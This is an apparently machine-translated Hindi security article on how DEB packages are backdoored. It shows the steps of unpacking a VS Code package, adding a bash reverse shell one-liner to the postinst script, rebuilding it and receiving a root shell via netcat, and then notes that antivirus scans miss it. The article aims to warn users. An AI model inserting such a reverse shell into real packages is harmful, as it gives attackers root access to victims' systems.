क्या आप जानते हैं कि हमलावर आपके पीसी तक अनधिकृत पहुंच प्राप्त करने के लिए DEB फ़ाइल में पैक की गई स्क्रिप्ट को संशोधित कर सकते हैं? यहां बताया गया है कि DEB पैकेज पिछले दरवाजे से कैसे बनाए जाते हैं।
चाबी छीनना
- DEB पैकेजों को आसानी से बैकडोर किया जा सकता है, जिससे जब आप उन्हें रूट अनुमतियों के साथ इंस्टॉल करते हैं तो हमलावर आपके सिस्टम में दुर्भावनापूर्ण कोड इंजेक्ट कर सकते हैं।
- संक्रमित DEB पैकेजों का पता लगाना मुश्किल है, क्योंकि उन्हें एंटीवायरस सॉफ़्टवेयर या वायरसटोटल जैसे क्लाउड समाधान द्वारा चिह्नित नहीं किया जा सकता है।
- अपनी सुरक्षा के लिए, यादृच्छिक साइटों से डीईबी पैकेज डाउनलोड करने से बचें, आधिकारिक डाउनलोड साइटों पर टिके रहें या समुदाय-भरोसेमंद साइटें, और अपने लिनक्स सिस्टम को नेटवर्क से सुरक्षित करने के लिए सुरक्षा उपकरण स्थापित करने पर विचार करें आक्रमण.
DEB फ़ाइलें सॉफ़्टवेयर पैकेज हैं जो डेबियन-आधारित लिनक्स वितरण पर शिपिंग सॉफ़्टवेयर का प्राथमिक प्रारूप हैं।
DEB पैकेज स्थापित करने के लिए, आपको रूट अनुमतियों के साथ dpkg जैसे पैकेज मैनेजर का उपयोग करना होगा। हमलावर इसका फायदा उठाते हैं और इन पैकेजों में पिछले दरवाजे डाल देते हैं। जब आप उन्हें dpkg या किसी अन्य पैकेज मैनेजर के साथ इंस्टॉल करते हैं, तो दुर्भावनापूर्ण कोड भी साथ में निष्पादित हो जाता है और आपके सिस्टम से समझौता कर लेता है।
आइए देखें कि डीईबी पैकेज पिछले दरवाजे से कैसे संचालित होते हैं और आप अपनी सुरक्षा के लिए क्या कर सकते हैं।
DEB पैकेज पिछले दरवाजे से कैसे बनाए जाते हैं?
इससे पहले कि आप समझें कि DEB पैकेज पिछले दरवाजे से कैसे बनाए जाते हैं, आइए जानें कि DEB पैकेज के अंदर क्या है। प्रदर्शन के लिए, मैं आधिकारिक माइक्रोसॉफ्ट वेबसाइट से माइक्रोसॉफ्ट विजुअल स्टूडियो कोड डीईबी पैकेज डाउनलोड करूंगा। यदि आप लिनक्स पर वीएस कोड स्थापित करना चाहते हैं तो यह वही पैकेज है जिसे आप डाउनलोड करेंगे।
डाउनलोड करना:विजुअल स्टूडियो कोड
अब जब आपके पास लक्ष्य पैकेज डाउनलोड हो गया है, तो इसे अनपैक करने का समय आ गया है। आप इसका उपयोग करके DEB पैकेज को अनपैक कर सकते हैं डीपीकेजी-डेब के साथ आदेश दें -आर सामग्री को संग्रहित करने के पथ के बाद ध्वजांकित करें:
dpkg-deb -R
इसे वीएस कोड पैकेज की सामग्री निकालनी चाहिए।
फ़ोल्डर में जाने पर आपको कई निर्देशिकाएँ मिलेंगी, हालाँकि, हमारी रुचि केवल इसी में है डेबियन निर्देशिका। इस निर्देशिका में अनुरक्षक स्क्रिप्ट शामिल हैं जो रूट विशेषाधिकारों के साथ इंस्टॉलेशन के दौरान निष्पादित होती हैं। जैसा कि आप पहले ही समझ चुके होंगे, हमलावर इस निर्देशिका में स्क्रिप्ट को संशोधित करते हैं।
प्रदर्शन के लिए, मैं इसे संशोधित करूंगा पोस्टइंस्टा स्क्रिप्ट और एक सरल वन-लाइनर बैश रिवर्स टीसीपी शेल जोड़ें। जैसा कि नाम से पता चलता है, यह एक स्क्रिप्ट है जो सिस्टम पर पैकेज स्थापित होने के बाद निष्पादित होती है।
इसमें ऐसे कमांड शामिल हैं जो कॉन्फ़िगरेशन को अंतिम रूप देते हैं जैसे प्रतीकात्मक लिंक सेट करना, निर्भरता प्रबंधन और बहुत कुछ। आप इंटरनेट पर ढेर सारे अलग-अलग रिवर्स शेल पा सकते हैं। उनमें से अधिकांश वैसे ही काम करेंगे. यहाँ नमूना रिवर्स शेल वन-लाइनर है:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1
आदेश का स्पष्टीकरण:
- दे घुमा के: यह वह आदेश है जो बैश शेल को आमंत्रित करता है।
- -मैं: ध्वज बैश को वास्तविक समय कमांड I/O की अनुमति देकर इंटरैक्टिव मोड में चलने के लिए कहता है।
-
>& /dev/tcp/ip/port: यह पुनर्निर्देशन करता है मानक आउटपुट और मानक त्रुटि एक नेटवर्क सॉकेट के लिए, अनिवार्य रूप से एक टीसीपी कनेक्शन स्थापित करना
और . - 0>&1: यह इनपुट और आउटपुट को एक ही स्थान पर यानी नेटवर्क सॉकेट पर रीडायरेक्ट करता है।
उन लोगों के लिए, जो शुरुआती नहीं हैं, रिवर्स शेल एक प्रकार का कोड है, जो लक्ष्य मशीन पर निष्पादित होने पर, हमलावर की मशीन पर वापस कनेक्शन शुरू करता है। रिवर्स शेल फ़ायरवॉल प्रतिबंधों को बायपास करने का एक शानदार तरीका है क्योंकि ट्रैफ़िक फ़ायरवॉल के पीछे की मशीन से उत्पन्न हो रहा है।
यहां बताया गया है कि संशोधित स्क्रिप्ट कैसी दिखती है:
जैसा कि आप देख सकते हैं, सब कुछ वैसा ही है लेकिन केवल एक पंक्ति जोड़ी गई है, यानी, हमारा बैश रिवर्स शेल। अब आपको फ़ाइलें वापस "में बनाने की आवश्यकता है.deb" प्रारूप। बस उपयोग करें डीपीकेजी के साथ आदेश दें --निर्माण झंडा या उपयोग डीपीकेजी-डेब साथ -बी निकाली गई सामग्री के पथ के बाद ध्वजांकित करें:
dpkg --build
dpkg-deb -b
अब पिछले दरवाजे वाला DEB पैकेज दुर्भावनापूर्ण साइटों पर भेजे जाने के लिए तैयार है। आइए एक ऐसे परिदृश्य का अनुकरण करें जहां एक पीड़ित ने DEB पैकेज को अपने सिस्टम पर डाउनलोड किया है और इसे किसी अन्य नियमित पैकेज के रूप में इंस्टॉल कर रहा है।
शीर्ष टर्मिनल फलक पीड़ित के पीओवी के लिए है और नीचे वाला हमलावर के पीओवी के लिए है। पीड़ित पैकेज को इंस्टॉल कर रहा है सुडो डीपीकेजी -आई और हमलावर धैर्यपूर्वक आने वाले कनेक्शनों को सुन रहा है नेटकैट लिनक्स में कमांड.
जैसे ही इंस्टॉलेशन ख़त्म हो जाए, ध्यान दें कि हमलावर को रिवर्स शेल कनेक्शन मिल गया है और अब उसके पास पीड़ित के सिस्टम तक रूट पहुंच है। अब आप जानते हैं कि DEB पैकेज पिछले दरवाजे से कैसे बनाए जाते हैं। आइए अब जानें कि आप अपनी सुरक्षा कैसे कर सकते हैं।
कैसे पता लगाएं कि कोई डीईबी पैकेज दुर्भावनापूर्ण है या नहीं
अब जब आप जानते हैं कि संक्रमित डीईबी पैकेज एक चीज हैं, तो आप सोच रहे होंगे कि संक्रमित लोगों को कैसे खोजा जाए। शुरुआत के लिए, आप इसका उपयोग करने का प्रयास कर सकते हैं लिनक्स एंटीवायरस सॉफ़्टवेयर क्लैमएवी की तरह। दुर्भाग्य से, जब पैकेज पर क्लैमएवी स्कैन चलाया गया तो उसने इसे दुर्भावनापूर्ण के रूप में चिह्नित नहीं किया। यहाँ स्कैन का परिणाम है:
इसलिए जब तक आपके पास एक प्रीमियम एंटीवायरस समाधान नहीं है (जो इस बात की गारंटी नहीं है कि आप हैक नहीं होंगे), दुर्भावनापूर्ण DEB पैकेजों का पता लगाना काफी कठिन है। आइए वायरसटोटल वेबसाइट जैसे क्लाउड समाधान का उपयोग करने का प्रयास करें:
जैसा कि आप देख सकते हैं वायरसटोटल को इसमें कुछ भी गलत नहीं मिला। खैर, ऐसे खतरों से खुद को बचाने का एकमात्र तरीका बुनियादी सुरक्षा स्वच्छता का पालन करना है जैसे कि हमेशा अज्ञात स्रोतों से फ़ाइलें डाउनलोड न करना किसी फ़ाइल के हैश की जाँच करना, और सामान्य तौर पर, संदिग्ध सॉफ़्टवेयर स्थापित करने से बचें।
इंटरनेट ऐसे खतरों से भरा पड़ा है. अपना डेटा खोए बिना सर्फ करने का एकमात्र तरीका आपके बारे में समझदारी रखना और विश्वसनीय साइटें ब्राउज़ करना है। इसके अतिरिक्त, लिनक्स के लिए, आपको यह भी पता लगाने का प्रयास करना चाहिए कि जो सॉफ़्टवेयर आप डाउनलोड कर रहे हैं उसमें कोई है या नहीं AppImage वैरिएंट क्योंकि वे स्व-निहित हैं और उन्हें सैंडबॉक्स किया जा सकता है और इस प्रकार, उन्हें आपके सिस्टम के संपर्क से दूर रखा जा सकता है।
यादृच्छिक साइटों से DEB पैकेज डाउनलोड न करें!
डीईबी पैकेज स्वाभाविक रूप से खराब नहीं हैं, हालांकि, हमलावर आसानी से हथियार बना सकते हैं और उन्हें बिना सोचे-समझे उपयोगकर्ताओं तक पहुंचा सकते हैं। जैसा कि दिखाया गया है, एक DEB पैकेज को आसानी से खोला जा सकता है और केवल कुछ कमांड के साथ कस्टम कोड जोड़ने के लिए संशोधित किया जा सकता है, जिससे यह मैलवेयर शिपिंग के लिए एक सामान्य वेक्टर बन जाता है।
यहां तक कि डीईबी पैकेजों पर साधारण बैकडोर भी शीर्ष एंटीवायरस समाधानों की पकड़ में नहीं आते हैं। इसलिए सबसे अच्छी बात यह है कि सुरक्षित रहें, वेब सर्फ करते समय अपना सामान्य ज्ञान रखें और हमेशा आधिकारिक डाउनलोड साइटों या समुदाय-विश्वसनीय साइटों से ही सॉफ्टवेयर डाउनलोड करें।
अब जब आप नई या अज्ञात साइटों से डीईबी पैकेज स्थापित करने के साथ आने वाले सुरक्षा जोखिमों से अवगत हैं, तो आपको नया सॉफ़्टवेयर स्थापित करते समय सतर्क रहना चाहिए। हालाँकि, आप जो इंस्टॉल कर रहे हैं उसके प्रति केवल सावधान रहना ही पर्याप्त नहीं है। आपका लिनक्स सिस्टम भी नेटवर्क हमलों का लक्ष्य हो सकता है।
यह सुनिश्चित करने के लिए कि नेटवर्क हमले की स्थिति में आप सुरक्षित हैं, आपको नेटवर्क सुरक्षा उपकरण स्थापित करने पर विचार करना चाहिए।